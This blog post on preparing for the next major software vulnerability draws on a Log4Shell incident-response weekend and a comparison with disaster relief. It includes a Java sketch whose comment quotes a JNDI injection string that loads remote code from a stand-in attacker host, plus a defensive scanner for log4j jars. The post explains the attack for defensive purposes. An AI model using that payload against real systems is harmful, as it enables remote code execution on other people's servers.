For every kind of natural disaster, there is a “Big One”. Everybody who lived through it remembers it; everybody else has at least heard stories about it. Every time a similar natural disaster occurs, it gets compared to this one.
We just commemorated the “Boxing Day Tsunami” of twenty years ago. Another example is “The Big One”, the devastating San Francisco earthquake of 1906. From today’s viewpoint, it wasn’t the strongest earthquake since then, but it was one of the first to be extensively covered by “modern” media. It also preceded the Richter scale, so we can’t directly compare it to current events.
In the rather young history of IT, we have had our fair share of “natural” disasters as well. We used to give the really bad ones nicknames. The first vulnerability that came equipped with a logo and its own domain was Heartbleed in 2014, ten years ago.
Let’s name-drop some big incidents:
- XZ Utils Backdoor in 2024: CVE-2024-3094
- Log4Shell in 2021: CVE-2021-44228
- Spectre and Meltdown in 2018: CVE-2017-5715 and CVE-2017-5754
- Heartbleed in 2014: CVE-2014-0160
- Debian Weak Keys Vulnerability in 2008: CVE-2008-0166
- Sasser Worm in 2004: CVE-2003-0533
- Blaster Worm in 2003: CVE-2003-0352
The first entry in this list differs from the others in that it was a “near miss”. It would have been a veritable catastrophe with millions of potentially breached and compromised systems. It was discovered and averted just before it would have been distributed worldwide.
Another thing worth looking at is the number of reported vulnerabilities per year:
https://www.cve.org/about/Metrics
From around 5k published vulnerabilities per year until 2014 (roughly one every two hours), the numbers rose to 20k in 2021 and 30k in 2024. That’s over 80 reports per day, or more than three every hour. A single human cannot keep up with these numbers. We need to rely on filters that block out the noise and highlight the relevant issues for us.
But let’s assume that the next “Big One” happens and catches our attention. There is one characteristic common to all the incidents I have witnessed that makes them similar to earthquakes or floods: it happens everywhere at once. Let me describe the situation using Log4Shell as an example:
The first reports indicated a major vulnerability in the log4j package. That seemed bad, but it was a logging module. What could possibly happen? We could lose the log files?
It soon became clear that the vulnerability could be exploited remotely by simply sending a malicious request that gets logged. Like a web request without proper authentication to a route that doesn’t exist. That’s exactly what logging is for: capturing the outliers and preserving them for review.
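To illustrate why that was so dangerous, here is a minimal sketch of the attack surface; the class and parameter names are made up and not taken from any real project. In the vulnerable log4j 2.x versions, lookups were evaluated inside logged data, so logging untrusted input was enough:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Minimal sketch: any attacker-controlled string that ends up in a log
// message is enough. Class and method names are invented for illustration.
public class LoginHandler {
    private static final Logger LOG = LogManager.getLogger(LoginHandler.class);

    void handleFailedLogin(String username, String userAgent) {
        // Looks perfectly reasonable: we capture the outlier for later review.
        // With a vulnerable log4j 2.x version, a value like
        //   ${jndi:ldap://attacker.example/a}
        // in either parameter triggers a JNDI lookup that can load remote code.
        LOG.warn("Failed login for user {} (User-Agent: {})", username, userAgent);
    }
}
```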
Right at the moment it dawned on us that every system with any kind of remote accessibility was at risk, the first reports of automated attacks emerged. It was now late Friday evening, the weekend had just started, and you realized you were in a race against bots. The one thing you cannot do is call it a week and relax for two days. In those 48 hours, the war would be lost and the systems compromised. You know that you have at most 4 hours to:
- Gather a list of affected projects/systems
- Assess the realistic risk based on current knowledge
- Hand over concrete advice to the system’s admins
- Or employ the countermeasures yourself
In our case, that meant reviewing nearly 50 projects, documenting the decisions and communicating with the operators.
While we did that, during Friday night, new information emerged that not only log4j 2.x, but also 1.x was susceptible to similar attacks.
We had to revise our list and decisions in light of the new situation. While we were doing that, somebody on the internet refuted the claim and proclaimed the 1.x versions safe.
We had to split our investigation into two scenarios that both got documented:
- Scenario 1: Only log4j 2.x is affected
- Scenario 2: All versions of log4j are vulnerable
We took action based on scenario 1 and held our breath, hoping scenario 2 wouldn’t come true.
One system running log4j 1.x was deemed “low impact” if taken down, so we took it off the net as a precaution. Spoiler: scenario 2 did not come true, so in hindsight this was an unnecessary step. But in the moment, it was one problem off the list, regardless of which scenario turned out to be valid.
The thing to recognize here is that the engagement with the subject is neither linear nor fixed. The scope and details of the problem change while you work on it. Uncertainties arise and need to be taken into account. When you look back on your work, you’ll notice all the unnecessary actions you took. They didn’t appear unnecessary in the moment, or at least you weren’t sure.
After we had completed our system review and carried out all the necessary actions, we switched to “survey and communicate” mode. We monitored the online discussion about the vulnerability and stayed in contact with the admins who were online. I remember an e-mail from an admin who copied some excerpts from the server log files with the caption: “The attacks are here!”.
And that was the moment my heart sank, because we had totally forgotten about the second front: Our own systems!
Every e-mail is processed by our mailing infrastructure, and one piece of it is the mail archive, a system written in Java. I raced to find out which specific libraries it uses. Because if a log4j 2.x library had been included, the friendly admin would have just inadvertently performed a real attack on our infrastructure.
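What such a hurried review can look like in practice: a minimal sketch, not the exact procedure we used, that walks a directory and reports which .jar files contain log4j 1.x or 2.x classes. It will not find copies that are shaded or nested inside other archives, so treat it as a first pass only.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

// Hypothetical first-pass scanner: lists every .jar under a directory
// that contains log4j 1.x or 2.x class files.
public class Log4jScan {
    public static void main(String[] args) throws IOException {
        Path root = Paths.get(args.length > 0 ? args[0] : ".");
        try (var paths = Files.walk(root)) {
            paths.filter(p -> p.toString().endsWith(".jar"))
                 .forEach(Log4jScan::inspect);
        }
    }

    static void inspect(Path jar) {
        try (ZipFile zip = new ZipFile(jar.toFile())) {
            boolean v1 = false;
            boolean v2 = false;
            var entries = zip.entries();
            while (entries.hasMoreElements()) {
                ZipEntry entry = entries.nextElement();
                String name = entry.getName();
                if (name.startsWith("org/apache/log4j/")) v1 = true;          // log4j 1.x
                if (name.startsWith("org/apache/logging/log4j/")) v2 = true;  // log4j 2.x
            }
            if (v1) System.out.println(jar + " contains log4j 1.x classes");
            if (v2) System.out.println(jar + " contains log4j 2.x classes");
        } catch (IOException ex) {
            System.err.println("Could not read " + jar + ": " + ex.getMessage());
        }
    }
}
```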
A few minutes after I finished my review (and found a log4j 1.x library), the vendor of the product sent an e-mail validating my result by stating that the product was not at risk. But those 30 minutes of uncertainty were pure panic!
In case of an airplane emergency, they always tell you to make sure you are stable first (i.e. put on your own oxygen mask before helping others). The same can be said about IT vulnerabilities: mind your own systems first! Had the mail archive been vulnerable, we would have secured our clients’ systems only to fall prey to friendly fire.
Let’s reiterate the situation we will find ourselves in when the next “Big One” hits:
- We need to compile a list of affected instances, both under our direct control (our own systems) and under our administration (our clients’ systems).
- We need to assess the impact of immediate shutdown. If feasible, we should take as many systems as possible out of the equation by stopping or airgapping them.
- We need to evaluate the risk of each instance in relation to the vulnerability. These evaluations need to be prioritized and timeboxed, because they need to be performed as fast as possible.
- We need to document our findings (for later revision) and communicate the decision or recommendation to the operators (a sketch of one such list entry follows below).
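To make the list and the documentation step more tangible, here is a minimal sketch of what a single entry of such an inventory could look like in code; all field names are hypothetical and this is not our actual tooling:

```java
import java.time.Instant;

// Hypothetical triage record for one affected instance; field names are invented.
public record TriageEntry(
        String system,          // e.g. "customer-webshop-prod"
        String operator,        // who runs it and receives our recommendation
        boolean internetFacing, // drives the priority: exposed systems first
        String impactIfDown,    // "low", "medium", "high": can we just switch it off?
        String decision,        // e.g. "patched", "taken offline", "mitigated", "not affected"
        Instant decidedAt       // timestamp for the later revision of the decision
) {}
```

Even a shared spreadsheet with these columns does the job; the point is that the structure exists before you need it under time pressure.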
This situation is remarkably similar to real-world disaster mitigation:
- The lists of instances are disaster plans
- The shutdowns are like evacuations
- The risk evaluation is essentially a triage task
- The documentation and delegation phase corresponds to the command-and-control phase of disaster relief crews
This helps a lot in seeing which elements can be prepared beforehand!
The disaster plans are the most obvious element that can be constructed during quiet times. Because no disaster occurs according to plan and plans tend to get outdated quickly, they need to be intentionally fuzzy on some details.
The evacuation itself cannot be fully prepared, but it can be facilitated by plans and automation.
The triage cannot be prepared either, but it can be supported by checklists and training.
The documentation and communication can be somewhat formalized, but will probably happen in a chaotic and unpredictable manner.
With this insight, we can look at possible ideas for preparation and planning in the next part of this blog series.